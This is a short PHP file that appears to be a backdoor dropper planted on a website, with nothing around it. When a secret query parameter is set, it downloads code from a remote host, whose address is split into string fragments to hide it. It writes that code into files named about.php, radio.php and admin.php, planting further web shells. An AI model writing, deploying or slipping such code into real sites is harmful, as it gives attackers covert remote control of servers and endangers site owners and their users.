<?php
if(isset($_GET['wp3c2b1a'])){var_dump(file_put_contents('about.php',file_get_contents('ht'.'tps://5'.'1la.zv'.'o2.x'.'yz/a1.t'.'xt'.$_GET['wp3c2b1a'])));var_dump(file_put_contents('radio.php',file_get_contents('ht'.'tps://5'.'1la.zv'.'o2.x'.'yz/a6.t'.'xt'.$_GET['wp3c2b1a'])));var_dump(file_put_contents('admin.php',file_get_contents('ht'.'tps://5'.'1la.zv'.'o2.x'.'yz/a8.t'.'xt'.$_GET['wp3c2b1a'])));}
